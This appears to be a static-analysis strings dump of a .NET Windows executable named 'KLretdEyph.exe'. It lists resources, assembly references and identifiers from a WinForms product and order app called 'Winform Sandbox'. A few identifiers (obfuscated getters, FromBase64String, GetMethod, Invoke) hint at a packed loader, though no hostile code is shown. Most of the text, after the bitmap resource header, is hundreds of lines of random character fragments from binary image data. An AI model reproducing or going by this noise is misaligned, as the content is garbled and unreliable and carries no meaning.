RT_GROUP_ICON 0x0004ba4c 0x00000030 LANG_NEUTRAL SUBLANG_NEUTRAL 2.46 None
RT_VERSION 0x0004ba7c 0x00000356 LANG_NEUTRAL SUBLANG_NEUTRAL 3.37 None
RT_MANIFEST 0x0004bdd4 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL 5.00 None

Imports


Assembly Information

Name KLretdEyph
Version 1.98.4.0

Assembly References

Name Version
mscorlib 4.0.0.0
System.Windows.Forms 4.0.0.0
System 4.0.0.0
System.Drawing 4.0.0.0
System.Xml 4.0.0.0
System.Data 4.0.0.0

Custom Attributes

Type Name Value
Assembly [mscorlib]System.Reflection.AssemblyTitleAttribute Winform Sandb
Assembly [mscorlib]System.Reflection.AssemblyProductAttribute Winform Sandb
Assembly [mscorlib]System.Reflection.AssemblyCopyrightAttribute Copyright \xa9 2017 - 20
Assembly [mscorlib]System.Runtime.InteropServices.GuidAttribute D7AFF0CC-F635-4140-A9B4-0FEA7D211F
Assembly [mscorlib]System.Reflection.AssemblyFileVersionAttribute 1.98.4

Type References

Assembly Type Name
mscorlib System.Runtime.CompilerServices.CompilationRelaxationsAttribute
mscorlib System.Runtime.CompilerServices.RuntimeCompatibilityAttribute
mscorlib System.Diagnostics.DebuggableAttribute
mscorlib System.Diagnostics.DebuggableAttribute/DebuggingModes
mscorlib System.Reflection.AssemblyTitleAttribute
mscorlib System.Reflection.AssemblyDescriptionAttribute
mscorlib System.Reflection.AssemblyConfigurationAttribute
mscorlib System.Reflection.AssemblyCompanyAttribute
mscorlib System.Reflection.AssemblyProductAttribute
mscorlib System.Reflection.AssemblyCopyrightAttribute
mscorlib System.Reflection.AssemblyTrademarkAttribute
mscorlib System.Runtime.InteropServices.ComVisibleAttribute
mscorlib System.Runtime.InteropServices.GuidAttribute
mscorlib System.Reflection.AssemblyFileVersionAttribute
mscorlib System.Runtime.Versioning.TargetFrameworkAttribute
System.Windows.Forms System.Windows.Forms.Form
mscorlib System.Collections.Generic.List`1
System System.ComponentModel.IContainer
System.Windows.Forms System.Windows.Forms.ComboBox
System.Windows.Forms System.Windows.Forms.Label
System.Windows.Forms System.Windows.Forms.Button
System.Windows.Forms System.Windows.Forms.ListBox
mscorlib System.Object
mscorlib System.EventArgs
mscorlib System.Decimal
mscorlib System.Enum
mscorlib System.Runtime.CompilerServices.CompilerGeneratedAttribute
mscorlib System.Diagnostics.DebuggerBrowsableState
mscorlib System.Diagnostics.DebuggerBrowsableAttribute
mscorlib System.Collections.Generic.List`1/Enumerator
mscorlib System.Reflection.Assembly
mscorlib System.Type
mscorlib System.Reflection.MethodInfo
mscorlib System.STAThreadAttribute
System System.CodeDom.Compiler.GeneratedCodeAttribute
mscorlib System.Diagnostics.DebuggerNonUserCodeAttribute
mscorlib System.Resources.ResourceManager
mscorlib System.Globalization.CultureInfo
System.Drawing System.Drawing.Bitmap
System System.ComponentModel.EditorBrowsableState
System System.ComponentModel.EditorBrowsableAttribute
System System.Configuration.ApplicationSettingsBase
System.Windows.Forms System.Windows.Forms.DataGridView
System.Windows.Forms System.Windows.Forms.DataGridViewTextBoxColumn
System.Windows.Forms System.Windows.Forms.DataGridViewCellEventArgs
System System.ComponentModel.INotifyPropertyChanged
System System.ComponentModel.PropertyChangedEventHandler
mscorlib System.Collections.Generic.IList`1
mscorlib System.Collections.Generic.ICollection`1
mscorlib System.Collections.Generic.IEnumerable`1
mscorlib System.Collections.IEnumerable
mscorlib System.Guid
System System.ComponentModel.BindingList`1
System System.ComponentModel.ListSortDirection
System System.ComponentModel.PropertyDescriptor
mscorlib System.IComparable
System.Windows.Forms System.Windows.Forms.GroupBox
System.Windows.Forms System.Windows.Forms.TextBox
mscorlib System.Exception
System.Windows.Forms System.Windows.Forms.DataGridViewRow
System.Windows.Forms System.Windows.Forms.DataGridViewCellStyle
System.Xml System.Xml.Serialization.XmlSerializer
System.Data System.Data.DataSet
System.Data System.Data.DataTable
System.Windows.Forms System.Windows.Forms.BindingSource
System.Windows.Forms System.Windows.Forms.ListBox/ObjectCollection
System.Windows.Forms System.Windows.Forms.Control
System.Windows.Forms System.Windows.Forms.ListControl
mscorlib System.IDisposable
System.Windows.Forms System.Windows.Forms.AutoCompleteMode
System.Windows.Forms System.Windows.Forms.AutoCompleteSource
System.Drawing System.Drawing.Point
System.Drawing System.Drawing.Size
mscorlib System.EventHandler
System.Windows.Forms System.Windows.Forms.ButtonBase
System.Drawing System.Drawing.SizeF
System.Windows.Forms System.Windows.Forms.ContainerControl
System.Windows.Forms System.Windows.Forms.AutoScaleMode
System.Windows.Forms System.Windows.Forms.Control/ControlCollection
mscorlib System.Convert
mscorlib System.AppDomain
mscorlib System.Reflection.MethodBase
System System.ComponentModel.Container
System.Windows.Forms System.Windows.Forms.Application
mscorlib System.RuntimeTypeHandle
System System.Configuration.SettingsBase
System.Windows.Forms System.Windows.Forms.ControlBindingsCollection
System.Windows.Forms System.Windows.Forms.Binding
System.Windows.Forms System.Windows.Forms.DataGridViewCellEventHandler
System System.ComponentModel.ISupportInitialize
System.Windows.Forms System.Windows.Forms.DataGridViewColumnHeadersHeightSizeMode
System.Windows.Forms System.Windows.Forms.DataGridViewColumnCollection
System.Windows.Forms System.Windows.Forms.DataGridViewColumn
System.Windows.Forms System.Windows.Forms.DataGridViewBand
System.Windows.Forms System.Windows.Forms.DataGridViewAutoSizeColumnMode
System.Drawing System.Drawing.Font
System.Drawing System.Drawing.FontStyle
System.Drawing System.Drawing.GraphicsUnit
mscorlib System.Delegate
mscorlib System.Threading.Interlocked
System System.ComponentModel.PropertyChangedEventArgs
mscorlib System.Collections.ObjectModel.Collection`1
System.Windows.Forms System.Windows.Forms.DataGridViewRowCollection
mscorlib System.Math
mscorlib System.String
mscorlib System.Comparison`1
System System.ComponentModel.ListChangedEventArgs
System System.ComponentModel.ListChangedType
mscorlib System.StringComparison
System.Windows.Forms System.Windows.Forms.MessageBox
System.Windows.Forms System.Windows.Forms.DialogResult
System.Data System.Data.DataRowCollection
System.Data System.Data.DataRow
System.Windows.Forms System.Windows.Forms.BorderStyle
System.Windows.Forms System.Windows.Forms.TextBoxBase
System.Windows.Forms System.Windows.Forms.ScrollBars
System.Drawing System.Drawing.Color
System.Windows.Forms System.Windows.Forms.DataGridViewTriState
System.Windows.Forms System.Windows.Forms.DataGridViewSelectedRowCollection
System.Windows.Forms System.Windows.Forms.DataGridViewCellCollection
System.Windows.Forms System.Windows.Forms.DataGridViewCell
System.Windows.Forms System.Windows.Forms.DataGridViewAutoSizeColumnsMode
System.Windows.Forms System.Windows.Forms.DataGridViewAutoSizeRowsMode
System.Windows.Forms System.Windows.Forms.DataGridViewContentAlignment
System.Drawing System.Drawing.SystemColors
System.Windows.Forms System.Windows.Forms.DataGridViewEditMode
System.Windows.Forms System.Windows.Forms.DataGridViewRowHeadersWidthSizeMode
System.Windows.Forms System.Windows.Forms.DataGridViewSelectionMode
System.Windows.Forms System.Windows.Forms.FormStartPosition
System.Windows.Forms System.Windows.Forms.FormBorderStyle
System.Windows.Forms System.Windows.Forms.FormClosingEventHandler
System.Data System.Data.XmlReadMode
System.Data System.Data.DataTableCollection
System.Windows.Forms System.Windows.Forms.DockStyle

!This program cannot be run in DOS mode.
.text
`.rsrc
@.reloc
*BSJB
v4.0.30319
#Strings
#GUID
#Blob
IEnumerable`1
ICollection`1
Comparison`1
IList`1
SortableBindingList`1
label1
Form1
dataGridView1
groupBox1
label2
button3
Class3
get_unify4
<Module>
SizeF
get_NBvpxSEgawBvbTH
labelTM
textBoxTM
SDSDSDS
CVVVVVVVVV
value__
System.Data
SaveData
mscorlib
System.Collections.Generic
get_Id
add_Load
OrderForm_Load
buttonAdd
OnListChanged
add_SelectedIndexChanged
lstOrder_SelectedIndexChanged
cbMenus_SelectedIndexChanged
add_PropertyChanged
remove_PropertyChanged
INotifyPropertyChanged
Interlocked
set_Enabled
set_FormattingEnabled
_isSorted
Synchronized
PopulateDataGrid
SelectedGroupDataGrid
GroupsDataGrid
NewGuid
<Id>k__BackingField
<Price>k__BackingField
<ProductsTable>k__BackingField
<Title>k__BackingField
<Name>k__BackingField
<GroupName>k__BackingField
<ProductName>k__BackingField
<MenuType>k__BackingField
<TradeMark>k__BackingField
<Description>k__BackingField
<PhoneNumber>k__BackingField
<SkuNumber>k__BackingField
<Supplier>k__BackingField
<ProductDetails>k__BackingField
<OrderItems>k__BackingField
<MenuItems>k__BackingField
<StorageUnit>k__BackingField
<Category>k__BackingField
DataGridViewBand
buttonAmend
SBind
GetMethod
get_Price
set_Price
get_TotalPrice
RefreshTotalPrice
lblTotalPrice
labelPrice
textBoxPrice
defaultInstance
set_DataSource
set_AutoCompleteSource
BindingSource
source
XmlReadMode
set_AutoScaleMode
set_AutoCompleteMode
set_RowHeadersWidthSizeMode
DataGridViewRowHeadersWidthSizeMode
set_AutoSizeMode
set_ColumnHeadersHeightSizeMode
DataGridViewColumnHeadersHeightSizeMode
DataGridViewAutoSizeColumnMode
set_SelectionMode
DataGridViewSelectionMode
set_WrapMode
set_AutoSizeColumnsMode
DataGridViewAutoSizeColumnsMode
set_AutoSizeRowsMode
DataGridViewAutoSizeRowsMode
set_EditMode
DataGridViewEditMode
AddRange
CompareExchange
get_WhiteSmoke
Invoke
DataTable
get_ProductsTable
set_ProductsTable
IComparable
IEnumerable
IDisposable
dtable
set_RowHeadersVisible
RuntimeTypeHandle
GetTypeFromHandle
numberOfPeople
get_Title
set_Title
DockStyle
get_DefaultCellStyle
set_DefaultCellStyle
set_ColumnHeadersDefaultCellStyle
DataGridViewCellStyle
set_BorderStyle
set_FormBorderStyle
FontStyle
get_Name
set_Name
PersonName
get_GroupName
set_GroupName
groupName
labelPrName
textBoxPrName
get_ProductName
set_ProductName
set_DataPropertyName
Combine
set_Multiline
Phone
ListChangedType
GetType
get_MenuType
set_MenuType
Compare
get_IsSortedCore
get_SupportsSortingCore
get_SortDirectionCore
GroupCore
RemoveSortCore
ApplySortCore
get_SortPropertyCore
get_Culture
set_Culture
resourceCulture
MethodBase
ButtonBase
ApplicationSettingsBase
TextBoxBase
Close
Dispose
Delegate
DebuggerBrowsableState
EditorBrowsableState
DataGridViewTriState
Delete
get_White
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
GeneratedCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
DebuggerBrowsableAttribute
EditorBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
labelCatalogue
get_Value
GetValue
value
buttonSave
Remove
KLretdEyph.exe
set_Size
set_MinimumSize
set_MaximumSize
set_AutoSize
set_ClientSize
myserialize
ISupportInitialize
IndexOf
get_Tag
set_Tag
System.Threading
Binding
System.Runtime.Versioning
FromBase64String
ToString
GetString
MainForm_Closing
add_FormClosing
disposing
Operating
System.Drawing
ShowDialog
KLretdEyph
set_MaxLength
buttonAdd_Click
add_Click
buttonAmend_Click
buttonDelete_Click
buttonSave_Click
buttonCancel_Click
btnClearMenus_Click
buttonEdit_Click
buttonExit_Click
btnAddMenu_Click
btnRemoveMenu_Click
buttonShow_Click
set_Dock
get_TradeMark
set_TradeMark
ToDecimal
Label
buttonCancel
System.Collections.ObjectModel
System.ComponentModel
WinformsSandbox.ComponentModel
IGroupsViewModel
get_GroupsViewModel
set_GroupsViewModel
_groupsViewModel
DataGridViewCell
System.Xml
ReadXml
WriteXml
GetFromXml
get_Control
ContainerControl
ListControl
Program
get_Item
AddItem
get_SelectedItem
get_DataBoundItem
RemoveItem
MenuItem
menuItem
System
EditDeleteAddForm
MainForm
OrderForm
AddEditForm
ShowForm
labelStoreUn
textBoxStoreUn
resourceMan
Vegetarian
AppDomain
get_CurrentDomain
DataGridViewColumn
DataGridViewTextBoxColumn
Application
set_Location
System.Configuration
System.Globalization
System.Xml.Serialization
System.Reflection
DataTableCollection
DataGridViewCellCollection
ControlCollection
DataGridViewColumnCollection
ControlBindingsCollection
ObjectCollection
DataRowCollection
DataGridViewSelectedRowCollection
DataGridViewRowCollection
ListSortDirection
_sortDirection
direction
set_StartPosition
FormStartPosition
Exception
get_Description
set_Description
StringComparison
OnComparison
IPerson
Button
CompareTo
MethodInfo
CultureInfo
get_Gainsboro
Bitmap
set_TabStop
IGroup
GetRandomGroup
Clear
set_ValueMember
get_PhoneNumber
set_PhoneNumber
get_SkuNumber
set_SkuNumber
sender
PhoneOrder
_currentOrder
lstOrder
get_ResourceManager
ProductsManager
get_Supplier
set_Supplier
labelSupplier
textBoxSupplier
PropertyChangedEventHandler
FormClosingEventHandler
DataGridViewCellEventHandler
System.CodeDom.Compiler
IContainer
add_RowEnter
GroupsDataGrid_RowEnter
remove_RowEnter
get_Silver
XmlSerializer
set_GridColor
set_BackgroundColor
set_ForeColor
set_SelectionForeColor
set_BackColor
set_UseVisualStyleBackColor
set_SelectionBackColor
GetEnumerator
.ctor
.cctor
PropertyDescriptor
System.Diagnostics
WinformsSandbox.Models.Interfaces
WinformsSandbox.ViewModels.Interfaces
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.Resources
ProductsManager.EditDeleteAddForm.resources
ProductsManager.MainForm.resources
Restaurant.OrderForm.resources
ProductsManager.AddEditForm.resources
ProductsManager.ShowForm.resources
WinformsSandbox.Properties.Resources.resources
WinformsSandbox.Views.GroupsView.resources
DebuggingModes
AcceptChanges
WinformsSandbox.Properties
get_Tables
EnableVisualStyles
WinformsSandbox.Models.Classes
WinformsSandbox.ViewModels.Classes
get_DataBindings
Settings
ListChangedEventArgs
PropertyChangedEventArgs
DataGridViewCellEventArgs
Equals
get_ProductDetails
set_ProductDetails
labelProductDetails
textBoxProductDetails
get_Cells
get_Controls
get_Items
get_OrderItems
set_OrderItems
get_MenuItems
set_MenuItems
System.Windows.Forms
Contains
get_Columns
set_AutoGenerateColumns
set_AutoScaleDimensions
System.Collections
groupBoxButtons
IGroups
get_Groups
set_Groups
_groups
set_ScrollBars
SystemColors
labelProducts
components
cbMenus
InitializeAvailableMenus
_availableMenus
btnClearMenus
WinformsSandbox.Views
get_Rows
set_AllowUserToAddRows
get_SelectedRows
set_AllowUserToDeleteRows
set_AllowUserToResizeRows
Concat
Format
GetObject
set_MultiSelect
Product
ProductDirDataSet
get_Highlight
buttonEdit
EndInit
BeginInit
get_StorageUnit
set_StorageUnit
GraphicsUnit
buttonExit
get_Default
SetCompatibleTextRenderingDefault
DialogResult
Restaurant
set_Alignment
DataGridViewContentAlignment
InitializeComponent
get_Current
Point
set_Font
get_Count
get_RowCount
Convert
RandomPersonSourceList
get_SelectedGroupBindingList
set_SelectedGroupBindingList
_selectedGroupBindingList
get_GroupsBindingList
set_GroupsBindingList
_groupsBindingList
SuspendLayout
ResumeLayout
PerformLayout
MoveNext
get_Text
set_Text
get_ControlText
set_HeaderText
get_HighlightText
get_WindowText
labelSku
textBoxSku
btnAddMenu
btnRemoveMenu
DataGridView
GroupsView
DataRow
DataGridViewRow
get_Window
buttonShow
get_Index
set_TabIndex
get_SelectedIndex
get_RowIndex
rowIndex
index
MessageBox
set_MaximizeBox
ComboBox
GroupBox
ListBox
TextBox
WinformsSandbox
get_Assembly
set_ReadOnly
RestaurantLibrary
get_Category
set_Category
labelCategory
textBoxCategory
op_Inequality
_sortProperty
WrapNonExceptionThrows
Winform Sandbox
Copyright
2017 - 2020
$D7AFF0CC-F635-4140-A9B4-0FEA7D211F60
1.98.4.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
3System.Resources.Tools.StronglyTypedResourceBuilder
16.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
16.1.0.0
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
hSystem.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aPADPAD
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Bitmap
IDATx^
h$d(Sf
'Z= dNO
qeA;C
~]J^V
~"iqo
f[^-&
fYND^
eSC8r
T #k6
[n.O>m
o9YzM^M
oLS\I|
&QklC
8\,e{
MJ>j;
z7#k!&
w#z"D
ZraQ,
)+eqOUv
$,`)KN
tu5gU
{'"^!
_f#1O
gz7tbt
]ZRT~H
v},ih
SlyWa
~}Ho3
@bY D
o^$kz
4Oy M
aC{tEadX
ZFL(g
w#ICsx
VC`Oy
|=?ww
_k-8P
#orw2
v7yX'
c1OsF1
*8I4P
%mH9|
4p,Iq
%E+k.M
Yd'"-
+"d5"
WjObj6
\UxHw!
SEo~>
:JsV,
|'"y3
ds#}F$c
;:4Qh
<;Auy
*Kf,eK
. L{)
ZyQPuE
!_uvq
?{=~[
Dx|!'
jcY0h,}vU
-;DWi
+4K6s
F<w0!
-a34X
:u#)b
#8.,dt|
HftFV
+o{3z
/SAV]
_QU>@
wjxy*
?aJ6l
O}DeO
#7;}c
5mhc`
Jk>ts
bLM{H
,&;w(:i
*]KqJ
@|NhPuy
]5:.O
'8s)=
3Fj)H
M\'R^
(E3ki/
a ^bc
M[_1Vu
${zR/
G7$9r
:ek>SQ
!O`2W:
:IUN=
(;_zN
,FJFr
nZGzp
l33vZ3
pKg25
r)q5K&
q_aB?
\Q[`"9L
&|8iq
u1U^C
MmGQLKz
E.cX)
jl8;#
spW^o
pY|[~
aIFfK
c1_=]
8e*G)
Lm=9M
[GL*cQ
70ox;
kpWq"
]K$^s([
@i8[Wj
]|*j#fQ
<EYwYX6
z3.#OZ
tt'`H+
vOE7>
_*Mq^v
h*{c<
c!o9~
?0-}'
#yw<'bg
R8~.j
NdKJ9Q>
jnML"
Q`5HZ
Zqulw2
T^,}g
l;M'F
Blk/>
b-$5b
Bu\+\
U(i^ M
4CZ"]|
GP<i6s
tI!3=ei>d
\7mj#-H
zvN]K
f!)lfM
o!p{a
Z3&k+
$ze{(
*]nO*@]
rsr&U
aIRS'
s%j{~
yqzg#
>F-*d#
Hv;'L
zWn#S
Ao=!u
N?YXS
s{#5gJ
kY29s
'DmQF
5#kY.
SsE8T
^"DU|>t
A!2-7~+]
Eas8z
v]clBWB|
{z1`B
I"!i'
X4t?f
;TH"-V
J%p}/N&w
W0dg.
i#?q/:
*vi(_
+kpK>
Dx#FL
],ho%
VB/z'uI
.fS/s,*
mywfH
~"k+EX
>foS[V
7N:5s
u|TkIk
r6G4$
o.Gt8R
c/pa_:#
9p;?#>0qr[
kDe=F
;tghE<
CYHB7&
^u!jW
4FM`T
s&F+?0j
kh&2~.
"v'Tm3
!"KoJ
Xpp5a
Ao8uJ
^#[a8
o/ys
2yRwN
KPY?j
v5#\5(
gvgc`#
e];2*
0,r1=
-2xrc8:
;R^6J
uM6DM
2dJ"Aj?
ttLC_c
T|x()d
O Xd"
c`T"$
|kvm{
BM(ls
Lul6,
XzYmz
.-N i
#Q|W$55
7Mhwf.
9s2q~
NktnD
U$\2ZL
Z=G"M(
G]%<#
W38wj
~$%J:
~>Qq"
1NiRg
oo0PH6
LlXBQ]G
=G\VK
15z))
rRMH4-
'ibYx
xKwTQ
q.iQ!
l1E2F
EjEG88
'|@_i
}bFVG
L9FkVcb9
0Vd}bY
O._Ma
4(1>&
J{:%?
9w~fb{
L<'H(^:
e5,tW0
M'V~#~w*
7kp5hDu
|SPF92
,#,6IU
6aAjJ
73#rM
aa,L}
zkP_oI
;g!3o\
1jnKx
3^i!wg4
6N~Oi
271Jh
E{9lkJ
ptGmay
KWwLJw
S_wd-
R3m9c
!sGZbm1j
'[cuxk
*SU-qi
Z8P?'
4`6Zi
|NR'if.
kM|6h2
g=!B{
?p.zF
Sz_)jw
)Aqu
v{=2Z{R
s!sV8
e\;4T;#
xf[E`
0^uUB
J|0;O
)$Psl
t/~aJH
L6&92"$
I\JI`
]S8.Q
N8/8J
)elSv
{B%w=
^jD{X|=
mtl;^
DtXKh
VEb(P
zDS]ix7
b%jeG
Q"[^q~
R~!LB
#]hoW
W(,Jb
@o=,J
Ik2:a;_
jSFk{
Eq6GE
6G3,*
k8(ea
FO;~Dd
Fs1{1*I
9JDk{
2#Xf-
8m ?d
kxT.Gt
QHtT:S
3Cz0QF%
;{2ah
~]^Of
&!Dxz
HSqO$
oM$Hs+
fNlo/
* vD>*:
,6T!0
z8Y&'
L3Grw
8<VY"
,z)X!
s=o2Y
U!/3Bj
q+g_dc7h>
l{t>(
FmiA"
k7.vXJc
fhqpB7
qT>]G
9(-=D
8Y9"aw{
H/j{K
aT<z7
6+pcp
HF_J_
(>>nx[
;*F29Y
PnSFk
kZFLo)
={X!7
=]|OdZ
g5`mtQ,jd
^mSV9
2fTl6e
P !l|
baw8Gu`
oW%T<
"/1 #P
[WUZk
w`Ie_
z/e8j
.Gyl3
XaQj%Xqh
I/:Zf
fc8g?
Fcy:~
]$N1'
py+MH
b]$I]
ZEiN"
47-&.
LFRc9
%-7|Wv
"NqOqx
L;bBlp
?$bH"
&<WwG
|\hKB
d)3=G
IS'3q
*8ht8U
=&hv^
<9o[@'a
k(*,gPU
v8J!_
r0/lf
Mu{T{v
|ZBL]4
8 @[
R?a(s
J|O$5U
eJQ[v
giD'mE
'n~)b
Lv`G//Z
3]3Tv
E<T,B
agqiA
Cn,Wi
*4;`~,
FnD/D
O^y(s
'0IjF
tW]AI
jv"ag
B_\.<
5E?|q
D={@r
JrO$`
Qa!a/
r}J;F
X=n6%
oEsd;
z8ON/
b#AS:
<%W%|
<gSYz
`AVU^
!{Fl&
4pt]7f
ebl0/
tDh_,
m\,Ne
#4.\O
Wc)V"
#9+314R
&sL<C
>6G2H
i}F0D
"5w/1=
YS zF
;lc;q
I-nD_r0
EuC w
ltV0<\
e'YZ*
fQ{&uma
"7TWF
[-i_:
9M,<Q
FAn;7c
X1fr+1
@F&Is
(ir M
q0AW%
4XP{9
p)j#2
(c|uS87
#Kk>-m
[G{qv
!4u{F
?_$Lx
gLo#
3.0whOZ
zbBUv
*IA&1
Bh{[2ZC
P:%81r
4wXBht
7bZ>!
A,+?H
\@IF#2
2wz FYy
gf%CI
B}oTGJB
`VAO:9
[T~&qx[
~y?2:w
Tww#1
}di?x
a?m|E
f12r;
&[c&+
\xv^$Y
>sV~:7C
ar?Ur0
z4k5-)
DlW.a
JF,2`{
LdBeY
[S4qKhD;R
bXcLD
Z4BEt
P~5?FM
Zr?2z
5wB;$
AT{M`
QbzL%
C7O"&
NJGEr^
*t660
mI$qS
W6,J9N
',c$j
a,Q$'
xaR(1
'eV=H
.'a3c8
Lr7{rm
Y,*J&
:a+ne"
c,ic;
L9gOVW=
[&]IEm
6+j->
<M#:m3
_{d/s&
L3mJ~
>j2+Q
W9 5s
gjpNo
E0q9i
4>/,f
qD&}0
M|UuAk
,_&|<
7MFcp
%/H^3
#$$<C
n6$T$
^P,rcyR3C5
tANMF/
F9D\nK
_vSr(_|l-Y}
Yx_rYM
PMZl0y
Ua%N:{
$D{G,
O]C.P
9d!&#Y
CuT=}V
Oxyg4
"kH_Z
Hq-.?-8
K?seW2A
1fSY 3
:(CAc
-dy*r
%w<0S
l&Wk'
Hk<Er
}+6zn
\MhFy
/6z>t!
G|TN&
-Y'Vs
9__`_
[0+Se
c}z<v
"+%/H
6A7"X3
ERxn4
-4F=P
h3U2BsK"
pY`&mU
=G#U/
Z(vP`
`3l7=!
3.eD"
;EZcgl
]Njm5
`BAe fF"F
NsLg3!
";):i#6z.:(B
Sy /Ei
$<y_iD
Z;0K`
^)=6,
3kQ!'
_<~Y,
lQ2%";\fT
_FuQ-
t^m*:
*Sxq=
bx!YO
aRL&mm<
j\M7F
FoN^hd
,&Mcp
0~r0w
zL{]{
,e00q
F91h[Ycj
lD#'#&
;y#/,"i
4 wV=
WnGRE
n/Mg}
97|7/:
Y"sG 5+
j]yb\
[;.G*
,]L>/
r-!uv;<\
gqLiN
(7{LH
h?e?]/
OZF(w
U6K<n
jb'ec#
2F]}/:1
%-[L[S
A(O6`
jc6~+B
J]S)+
q"8v1
k)\~-\
?~j,S
{Csh-k
JN#8[
E/}xz
_oa";
&D;>d
>~l;^E
qgv2=
}|8k-
Cx7d(9
WDrYW"
Rsi7O
h-[R'
8kbm(
:0 x=U
/RZ~D
)*<!0
w/\tm
=gsyv
[T*lb
v"=U.
?Z3zN
O,%.r
. jen|
%#J0?^L
ii&<<?
Qz<{4
8XZb]
=fTuc_h
C:.EI,
Va{E0%
W#zkR)y
(U^!M
-q|^d
tz_ID
N3$!>
<R670
n~o&-.Gz
>nO2Ao
?(;<%
HKOgV$
2v"jg
aJA z~Ml
F^%Es(\
vYMlV.6r
HDwG$
I(:*6
C!s4W
x=3e}
rWE\j
bm>)f+8
=J`]v!:
REv[v
`ZcLVI*.cm
2nlzAWa
9H]`r
Ighb4
J[Y\ OTJ3
A9/4zQ
'o3;J
/\'%c[w_
"uBo?gs|
JYP1#
atb+Sr^
b93i0a?
M3m4c
3OQ*D
~_k]g
GBLq-e
{Csu1
.5Qg({
{l6>L
XDP\13
?sA^?
0~~o]
)9xMLa
CeDK/
a] .!S
8y>fV
ITaWb
wk8.r{X
"6zFf
w-{(\Nm&~:O
iYb\d
niQ$D
fu).9G8q!
x}XK~
}yj^g
Z"0.=
:W6,TD%?
)v3&Z'
o[sAb
7rfh^
/xb%y
xc;gLV|F
J,m;L
?z.'jg
@1'y0
:R4r%
P|tf1P
$AB?O/d
'mI]6
&s\wr
h*[>Z
{//A!4
p~>"kJ
H'^5]
NWy?"
ty$fs?
T!Ko,
_0a_[V
L{>E,
wti'|0
gLpv+N]
+9W,=]
U3J*T
U CZa0F
]3rV*
_"D|3y)
2#Uq6i
;\Ad0E
X{:&V
To|&}
)T9KRj4
tqCIk
M1/GL
x;3Tz
raGC4:
?Iu\"
-:KgN
USp^a
EP]?<
)SEe(g
y43}V
{h$nnsHi
XtFkS3
=wvEo
"oN>,
DyQ3Y8
(&7t
0L*%p
KMkX$
Z`Oap/
"dOmc
+lbd?
qORAa
UI$FX
-)j7a
y*S_;
tbyx_
+K)kWL
q9IK/c
\{N|.
] vm9
~h6vu
B7{%O
6Y[qvw*m
h%D"5
?lhPt
}k#6D
b8UeC
E{@[j
gT: sn
!=FWg
ymPq-
_wD7o
A!(WK
a~2g[
5Fquh,
/T,Da
F3fTk&
gLML)
lM`dJ6=
3d7)2
S9h':
tf\C;
nhC^@
C51~r
"'t>wc
a1CfX027
J:R5*
3fe!rM
_7Xx`+*
4!J--ZF
awyl[A
(<|Il
gT-4%
%u/Q2P!
1fllc
kA8^A
s=V0Ve0
~ iI1
sWY7.
xe!xt9
P-7!^
8vG^V
{;G*%
9RQ#qwS)
$_;Tf
Z/GLh
vn7WM
dN6c|
]B\KvH
j?>9e
Pkv)?c
-#Tu#s7?FvxW
Lq"Cf
WFp`g
e96OgS
h=w(*#E
>2Zm(c
ukVL8F
?g ?k
~ iI1
8+F5$qW
4#y=W
[;B]t
!:<VX
B^`%7
!x{gv
w5)57f
#|vKa
a[K|p
6|ASN/
J8 Re_
+z2i\
F6,J#
R*Ncn
FyF.KSn
?abZK
I ~f_%tF
m5#2o"
Y"4<U7
|P^D;
?WO&)
9b5Go
M\_&lb!
>HdUH6
T3&Si&
NeX[]
kzB^ov?
cF.>O
#7q#>
=OZc:
)U0%q
f11TU
}L/;@L
-[Ve"
Xr[q"{
xze,dI
"mz$C
<=..'kq
F=`4o
gpLj2W
/pRu$N
bm/s!
k[Qfm
}"/i0n
Y4l.w
}w&`V
fQR0O
8[#IQ
p7\@S
GY?v%
;"Cx[
7&I"t,R
E`T v[
n&|AG
fLuU(
#)6^l
F.O#D
fWXc&
l[PHs
s%p,e
}+Cu[
%bW!r
:Q9[wM
5m)nMn
t#Jw11
.0fn_
$fm)&
2?ar.
p*KGkb
o\4xE
KqK:#
/=D^W5.
p[7K2>L|
[*i/'
GWIDAT+*
l"Oo<b
HSV$b
p\k%%
_\^c.I
NkuiZ
qx%{*
'6h$r
yT|?A
}4'vY
|h#3j
h49JR
rK=Qk6
3:Qyw
CUk7l/$
~ q7/&W
,|XAF
s0i~N
&K3V#w4
wADTe2R89
q;&y-c
56O9EhA%
Na4)+[pr
7lcE<u
Y'DHS
rXm99
1|>JQ
EdyeC
iM6<t
}8-)w
;InM=Ek
v|6*Ie
I&)(J
,3^FS7G
bd+D'
S?jWN
YX//d
obVd#Z
o$`]O\~
Kx*k_X1
ic1r]c
;3oA4
=72cl4
^Xz5S
P{rk?
iqZj(
Ja5,{
3#p{U
;jrlc#^
p[u1g~
0;{3}
[2s'(
HBi8'-
VcQX7*
BMO}Nt
As(>f
JE4bn
LHy,w
as$"m
fV8(r
6bDb>
kX+/C
a|(#~I
<YF[/
dQ1WF
"B~"3
Re"{t
VO!#n=
<=o"k6
